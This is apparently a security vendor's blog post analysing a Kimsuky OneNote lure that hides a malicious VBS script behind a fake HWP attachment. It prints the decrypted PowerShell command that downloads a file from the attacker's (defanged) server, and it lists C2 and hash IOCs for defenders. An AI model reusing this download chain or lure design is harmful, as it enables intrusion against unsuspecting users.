OneNote Malware Disguised as Compensation Form (Kimsuky)

AhnLab Security Emergency response Center (ASEC) has discovered the distribution of a OneNote malware disguised as a form related to compensation. The confirmed file is impersonating the same research center as the LNK-type malware covered in the post below. Based on the identical malicious activity performed by the VBS files, the team has deduced that the same threat actor is behind both incidents.

As shown in the figure below, a page discussing compensation appears when the OneNote file is opened, and prompts users to click on what appears to be the area where an HWP file is attached.

Figure 1. Contents displayed upon opening the OneNote file

Figure 2 makes it clear that this area does not contain an HWP file; rather, it conceals a malicious script object named ‘personal.vbs’.

Figure 2. Concealed malicious script

If a user clicks on this script, the malicious VBS file is created and executed under the filename personal.vbs in a temporary directory. The code of the generated VBS file makes the following, obfuscated command appear like an annotation before re-reading it to decrypt and execute the malicious command.

Figure 3. personal.vbs code

The decrypted script code ultimately accesses hxxp://delps.scienceontheweb.net/ital/info/list.php?query=1 to execute an additional script code. This URL is currently inaccessible, but its URL format reveals that it most likely executed an information-stealing script like the one in the post below.

Afterward, it downloads and opens an HWP file from hxxp://delps.scienceontheweb.net/ital/info/sample.hwp through a PowerShell command. 

  • Executed PowerShell command
    powershell $curpath=(New-Object -ComObject Shell.Application).NameSpace(‘shell:Downloads’).Self.Path;Invoke-WebRequest -Uri hxxp://delps.scienceontheweb.net/ital/info/sample.hwp -OutFile $curpath\personal.hwp;start-sleep -seconds 1

Figure 4. Ultimately executed script code

Although the HWP file could not be downloaded during the time of analysis, it is presumed that a normal HWP file was used in order to deceive users. Additionally, as the filename of the HWP file in the OneNote is the same as the filename (PersonalDataUseAgreement.hwp) shown in Figure 10 of the post <Malware Distributed Disguised as a Password File> (PersonalInfoUseAgreement.hwp), it is assumed that a similar HWP file was used in this case as well.

Due to recent confirmed cases of the Kimsuky group distributing malware in various forms such as CHM, LNK, and OneNote, which were previously distributed as Word files, users are strongly advised to exercise extra caution. These files are usually distributed via emails disguised as forms related to compensation or personal information, so users must practice caution when opening email attachments.

[File Detection]
Dropper/MSOffice.Generic (2023.03.20.02)
Trojan/VBS.Generic.SC186657 (2023.03.03.00)

[IOC]
MD5
aa756b20170aa0869d6f5d5b5f1b7c37 – OneNote
f2a0e92b80928830704a00c91df87644 – VBS

C2
hxxp://delps.scienceontheweb.net/ital/info/list.php?query=1

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post OneNote Malware Disguised as Compensation Form (Kimsuky) appeared first on ASEC BLOG.

Article Link: https://asec.ahnlab.com/en/50303/